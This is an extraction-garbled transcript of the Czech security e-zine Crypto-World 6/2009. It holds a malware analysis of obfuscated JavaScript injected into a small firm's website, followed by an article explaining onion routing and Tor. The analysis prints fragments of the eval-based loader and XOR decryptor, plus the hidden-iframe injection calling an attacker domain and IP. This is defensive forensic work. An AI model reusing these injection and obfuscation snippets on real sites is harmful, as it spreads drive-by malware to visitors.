+ All Categories
Home > Documents > Sešit 6/2009 (452 kB)

Sešit 6/2009 (452 kB)

Date post: 20-Dec-2016
Category:
Upload: voliem
View: 232 times
Download: 3 times
Share this document with a friend
23
Crypto-World 6/2009 1 Crypto-World Informační sešit GCUCMP ISSN 1801-2140 Ročník 11, číslo 6/2009 15. červen 2009 6/2009 Připravil: Mgr. Pavel Vondruška Sešit je přednostně distribuován registrovaným čtenářům. Starší sešity jsou dostupné na adrese http://crypto-world.info (1316 registrovaných odběratelů) Obsah : str. A. Výprava za obsahem javascriptu (J.Vorlíček, J.Suchý) 2-6 B. Anonymita v globální síti (J.Hajný) 7-11 C. Formát elektronické fakturace ISDOC (P.Kuchař) 12-18 D. Malá soutěž v luštění RSA (P.Vondruška) 19-20 E. O čem jsme psali v červnu 1999-2008 21-22 F. Závěrečné informace 23 Příloha: javascript-priloha.pdf (179 kB) Obsah přílohy : Výprava za obsahem javascriptu (J.Vorlíček, J.Suchý) Příloha 1 - „Vložený Javascript – kód ve stránce“ str.1-6 Příloha 2 - „Vložený Javascript – zdrojový kód“ str.7-9 Příloha 3 - „Vložený Javascript – škodlivý kód“ str.10-11 Příloha 4 - „Výsledky antivirových kontrol“ str.12-24 javascript-priloha_1_3.rtf (64 kB)
Transcript
Page 1: Sešit 6/2009 (452 kB)

Crypto-World 62009

1

Crypto-World Informačniacute sešit GCUCMP

ISSN 1801-2140

Ročniacutek 11 čiacuteslo 62009 15 červen 2009

62009 Připravil Mgr Pavel Vondruška

Sešit je přednostně distribuovaacuten registrovanyacutem čtenaacuteřům Staršiacute sešity jsou dostupneacute na adrese

httpcrypto-worldinfo (1316 registrovanyacutech odběratelů)

Obsah str A Vyacuteprava za obsahem javascriptu (JVorliacuteček JSuchyacute) 2-6 B Anonymita v globaacutelniacute siacuteti (JHajnyacute) 7-11 C Formaacutet elektronickeacute fakturace ISDOC (PKuchař) 12-18 D Malaacute soutěž v luštěniacute RSA (PVondruška) 19-20 E O čem jsme psali v červnu 1999-2008 21-22 F Zaacutevěrečneacute informace 23 Přiacuteloha javascript-prilohapdf (179 kB)

Obsah přiacutelohy Vyacuteprava za obsahem javascriptu (JVorliacuteček JSuchyacute) Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

javascript-priloha_1_3rtf (64 kB)

Crypto-World 62009

2

A Vyacuteprava za obsahem javascriptu Jaroslav Vorliacuteček (jerry at cybercave dot cz) Jakub Suchyacute (info at jsuchy dot cz) Uacutevod Jeden z velmi nebezpečnyacutech počiacutetačovyacutech myacutetů současneacute doby je že škodlivyacute koacuted se nachaacuteziacute vyacutehradně na straacutenkaacutech silně eroticky laděnyacutech přiacutepadně straacutenkaacutech poskytujiacuteciacutech warez a jinyacutech podobnyacutech Předpoklaacutedaacutem že většina kolegů už zažila nesčetněkraacutet argumentaci klientů o nenavštěvovaacuteniacute zaacutevadnyacutech straacutenek a překvapeniacute nad zjištěniacutem existence havěti šiacuteřeneacute z webovyacutech straacutenek Bohužel se havěť nachaacuteziacute již i na straacutenkaacutech ktereacute majiacute daleko do zaacutevadneacuteho obsahu Nedaacutevno jsem pomaacutehal kolegovi Jakubovi Sucheacutemu s analyacutezou malware nalezenyacutem na internetovyacutech straacutenkaacutech jedneacute maleacute českeacute firmy Bylo prvniacuteho dubna 2009 a předpoklaacutedaacutem že jsem nebyl saacutem v pohotovosti ohledně červa Conficker Lehce po poledni mi napsal Kuba zdali bych nepomohl s jedniacutem javascriptem co našel Prvotniacutem impulsem ke zkoumaacuteniacute bylo že se antivir začal hlaacutesit po naacutevštěvě straacutenek Jelikož se Conficker neprojevoval a toto vypadalo na velmi zajiacutemavyacute reacutebus k řešeniacute pustil jsem se do analyacutezy Analyacuteza hlavičky javascriptu Analyacuteza byla provedena v prostřediacute uzpůsobeneacutem k analyacuteze havěti Pokud byste chtěli kroky po mně opakovat prosiacutem provaacutedějte tak v prostřediacute kde nehroziacute šiacuteřeniacute viroveacute infekce a naacutestroji ktereacute zaručiacute že se Vaacutem havěť nevymkne z rukou a neovlaacutedne Vaši siacuteť Nyniacute již k analyacuteze javascriptu Uprostřed php straacutenky byl vložen koacuted (kompletniacute koacuted je uveden v [13] přiacuteloha 1 bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo) kteryacute začiacutenal takto ltscript type=textjavascriptgtvar jj=window[StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)](StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)) jj(x66x75x6ex63x74x69x6fx6ex20x63x56x55x69x31x47x28x62x41x68x59x29x7bx66x75x6ex63x74x69x6fx6ex20x62x44x67x34x28x6bx6fx7ax29x7bx76x61x72x20 Na prvniacute pohled to vypadaacute jako javascript kteryacute se maacute před něčiacutem nebo někyacutem ukryacutet Stroji tento koacuted nevadiacute ale tato toto skrytiacute nebo zamlženiacute (anglicky obfuscation) ztěžuje porozuměniacute koacutedu s ciacutelem vyhnout se detekci antivirů Prvniacute čaacutest javascriptu - window[StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108)](StringfromCharCode(101)+new String(v)+new String(a)+StringfromCharCode(108) - aacute ve skutečnosti window[eval](eval) Funkce val vyhodnotiacute řetězec danyacute jako parametr a spustiacute ho jako javascriptovyacute koacuted Znaky začiacutenajiacuteciacute x66 jsou pouze ASCII nebo Unicode znaky zapsaneacute hexadecimaacutelně Neviacutem zda se nepohybuji pouze na škodlivyacutech straacutenkaacutech ale většinou když naraziacutem na funkci eval nebo unescape tak byacutevajiacute spojeny s nekalyacutem koacutedem kteryacute zneužiacutevaacute zranitelnostiacute Internet Exploreru a stahuje havěť do počiacutetače

Crypto-World 62009

3

Ze zkušenosti doporučuji nerozebiacuterat škodlivyacute koacuted na platformě pro kterou je určen Zaacutesadně provaacutediacutem analyacutezu malware pro Windows na Linuxu a obraacuteceně K analyacuteze zamlženeacuteho koacutedu (anglicky obfuscated code) použiacutevaacutem v maximaacutelniacute miacuteře automatickeacute naacutestroje nebo skripty Z velmi prosteacuteho důvodu - šetřiacute to čas Analyacuteza zdrojoveacuteho koacutedu javascriptu Uklaacutedaacutem zamlženyacute (angl obfuscated) řetězec do souboru payload a zjišťuji co je ukryteacute uvnitř Jeden linuxovyacute přiacutekaz - cat payload | perl -pe sx()chr(hex($1))ge - rozkoacutedoval payload do čitelnějšiacute podoby ltscript type=textjavascriptgt function cVUi1G(bAhY) function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 (kompletniacute koacuted je uveden v [13] přiacuteloze 2 bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo) Rozloženyacute koacuted již vypadaacute daleko čitelněji než původniacute forma a lze odhadovat co dělaacute Celyacute skript se tak sklaacutedaacute ze dvou čaacutestiacute Prvniacute je již čitelnyacute koacuted kteryacute provede prvniacute rozkrytiacute koacutedu (anglicky de-obfuscation) a druhou čaacutestiacute je nejzajiacutemavějšiacute čaacutest javascriptu - vlastniacute (v tuto chviacuteli jsem předpoklaacutedal) maligniacute koacuted Před rokem a půl uacutetočniacutekům většinou stačil pouhyacute unescape k vyhnutiacute se detekci antivirovyacutech programů nicmeacuteně od teacute doby se vyvinuly jako metody detekce tak metody skryacutevaacuteniacute Rozkoacutedovat řetězec nebylo žaacutednyacute probleacutem ale bohužel neobsahoval žaacutedneacute čitelneacute čaacutesti Důvod je jednoduchyacute Vnitřniacute koacuted je zašifrovanyacute jednoduchou šifrou Pokusiacutem se popsat co danyacute koacuted znamenaacute function dsWV7(fE7uydQbss) return fE7uycharCodeAt(dQbss) vraacutetiacute z řetězce fE7uy znak na pozici dQbss function bDg4(koz) var gXARrbV=0 var abt=kozlength zKpOXd=0 while (zKpOXdltabt) gXARrbV+=dsWV7(kozzKpOXd)abt zKpOXd++ return (gXARrbV+) zpracuje řetězec koz a vynaacutesobiacute součet ASCII hodnot v řetězci deacutelkou řetězce Vlastniacute dešifrovaciacute koacuted vypadaacute takto var dkm7Gx=eval(a_r0gu_m+e0nt1s++c1a+l_le_e+replace([0_1+]g )) v dkm7Gx je odkaz na vlastniacute funkci k umožněniacute rekurze k4Rca= xF7S=0 r6bZl=0 var tIu6Ye=(new String(dkm7Gx))replace([^a-z0-9A-Z_-]g)

Crypto-World 62009

4

Niacuteže koacuted jsem nebyl schopen rozluštit bez spuštěniacute v chraacuteněneacutem prostřediacute (Sandbox) var xwjC=bDg4(tIu6Ye) bAhY=unescape(bAhY) lt- v bAhY je nyniacute uložen obfuskovanyacute koacuted v binaacuterniacute podobě for(var lJQZh=0 lJQZh lt (bAhYlength) lJQZh++) var bFKWW=dsWV7(tIu6YexF7S)^dsWV7(xwjCr6bZl) var uF0=dsWV7(bAhYlJQZh) xF7S++r6bZl++ k4Rca+=StringfromCharCode(uF0^bFKWW) if(r6bZlgtxwjClength)r6bZl=0 if(xF7SgttIu6Yelength)xF7S=0 Jako kliacuteč k dešifrovaacuteniacute se použiacutevaacute kliacuteč bFKWW kteryacute je ziacuteskaacuten jako XOR znaků ziacuteskanyacutech z prostřediacute v průběhu vykonaacutevaacuteniacute javascriptu Otevřenyacute text je poteacute ziacuteskaacuten jako šifrovanyacute text XOR kliacuteč Metoda šifrovaacuteniacute nebyla hlavniacutem ciacutelem paacutetraacuteniacute je to pouze zajiacutemavost nebo překaacutežka kterou je třeba překonat Daacutel už se bez znalosti prostřediacute ve ktereacutem je javascript spuštěn nedalo pokračovat Na řadu přišel experiment v chraacuteněneacute laboratoři Vlastniacute skrytyacute koacuted Javscript jsem krokoval v Microsoft Script Editoru a po chviacuteli jsem ziacuteskal teď již kompletniacute koacuted function ascgpELkf() ascgpELkfprototype = getFrameURL function() var dlh=documentlocationhost return http+ + ((dlh == || dlh == undefined) thisgetRandString() ) + dlhreplace ([^a-z0-9-])replace (+) + + thisgetRandString() + + thispath + thishost hostqqcn pathf+q+StringfromCharCode(119)+e+r+new String(z)+StringfromCharCode(46)+new String(c)+new String(n) (uveden v [13] přiacuteloze 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo) Celeacute toto sloužiacute k instalaci koacutedu ze straacutenek uacutetočniacuteka anebo k vloženiacute naacutesledujiacuteciacuteho koacutedu do dokumentu kteryacute se vykonaacute při zobrazeniacute straacutenky Vloženyacute koacuted do straacutenky je naacutesledujiacuteciacute ltdiv style=displaynonegtltiframe src=httpAAXXXYczb7d4677a720fcd24fqwerzcnqqcngt ltiframegtltdivgt AAAXXXCZ je URL ze ktereacute byla tato straacutenka volaacutena b7d4677a720fcd24 je naacutehodneacute čiacuteslo Pokud se skript vykonaacute pak uacutetočniacutekovi na domeacuteně fqwerzcn (IP 21211718534) je odeslaacuten naacutesledujiacuteciacute HTTP požadavek GET qqcn HTTP11 Accept imagegif imagex-xbitmap imagejpeg imagepjpeg applicationx-shockwave-flash Referer httpAAXXXYcztesthtml Accept-Language en-us Accept-Encoding gzip deflate User-Agent Mozilla40 (compatible MSIE 60 Windows NT 51 SV1) Host AAXXXYczb7d4677a720fcd24fqwerzcn Connection Keep-Alive

Crypto-World 62009

5

Vyacutepis z whois pro IP adresu 21211718534 inetnum 2121171850 - 212117185255 netname RUSTELEKOM descr Rustelekom LLC country RU Analyacuteza malware Pokud fqwerzcnqqcn otevřete pak se Vaacutem do počiacutetače staacutehne vcelku slušneacute množstviacute havěti Zajiacutemaveacute na straacutence uacutetočniacuteka je že je zde implementovaacuten mechanizmus sledovaacuteniacute kdo jakeacute přiacutekazy posiacutelaacute a zdaacute se že maacute oběť dva pokusy na ziacuteskaacuteniacute infekce Poteacute dojde na nějakyacute čas k zablokovaacuteniacute pravděpodobně IP adresy Je možneacute že se takto uacutetočniacutek braacuteniacute analyacuteze provozu nebo se pouze snažiacute šetřit siacuteťovyacute provoz Bohužel toto velmi znesnadňuje analyacutezu a opakovaacuteniacute pokusu Po otevřeniacute ve virtuaacutelniacute laboratoři stouplo vytiacuteženiacute procesoru laboratoře na 100 a do dvou minut laboratoř havarovala se zobrazeniacutem modreacuteho šetřiče obrazovky Poteacute jsem již stanici nespouštěl do Windows ale provedl jsem boot do dřiacuteve volně dostupneacuteho naacutestroje pro forenzniacute analyacutezu ndash Helix CD Vytvořil jsem MD5 hash (odborniacuteci prominou) všech souborů na disku a dal se do zjišťovaacuteniacute změn porovnaacuteniacutem originaacutelniacutech souborů se změněnyacutemi Každyacute zjištěnyacute přidanyacute nebo změněnyacute soubor jsem nahraacutel na virustotalcom abych zjistil jak se k němu postaviacute jednotliveacute antiviroveacute systeacutemy Vyacutesledky jsou vcelku zajiacutemaveacute doporučuji je shleacutednout v [13] přiacuteloze 4 ndash bdquoVyacutesledky antivirovyacutech kontrolldquo

Zdroj infekce

V okamžiku kdy bylo zjištěno co danyacute javascript znamenaacute pustili jsme se s Kubou do zjištěniacute kde se vlastně na straacutenkaacutech objevil a odkud Podařilo se naacutem kontaktovat administraacutetora a ziacuteskat logy z web serveru V logu přiacutestupů jsme objevili mnoho zaacuteznamů o přihlaacutešeniacute na FTP z adres z Čiacuteny Zajiacutemavyacutem zjištěniacutem bylo že jsme našli pouze uacutespěšnaacute přihlaacutešeniacute čili uacutetočniacutek odněkud ziacuteskal platneacute uživatelskeacute jmeacuteno a heslo Paacutetrali jsme zdali existuje vir kteryacute krade hesla do FTP a našli jsme jich několik Předpoklaacutedaacuteme že počiacutetač administraacutetora straacutenek byl dřiacuteve infikovaacuten virem jehož ciacutelem bylo ziacuteskat přiacutestupy na FTP uacutečty ndash napřiacuteklad viry Virut nebo Neosploit Bohužel paacutetrat zpětně v čase jakyacute vir byl na stanici několik měsiacuteců zpět nepřineslo žaacutednyacute vyacutesledek

Poteacute jsme takeacute zjišťovali co se změnilo na FTP uacutečtu a našli jsme že pro danou domeacutenu byl do každeacuteho existujiacuteciacuteho php a js souboru vložen škodlivyacute javascript

Zaacutevěr

Po prohleacutednutiacute exploitů bych doporučil na klientskyacutech počiacutetačiacutech miacutet staacutele aktualizovaneacute Windows použiacutevat firewall zajistit nainstalovanyacute a aktuaacutelniacute antivirovyacute systeacutem s aktuaacutelniacute antivirovou databaacuteziacute při pohybu po internetu použiacutevat prohliacutežeč Firefox s nainstalovanyacutem NoScript pluginem Takteacutež bych nedoporučoval použiacutevaacuteniacute automaticky funkci pamatovaacuteniacute hesel miacutesto toho by bylo vhodneacute použiacutet password managery jako je napřiacuteklad Keepass

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

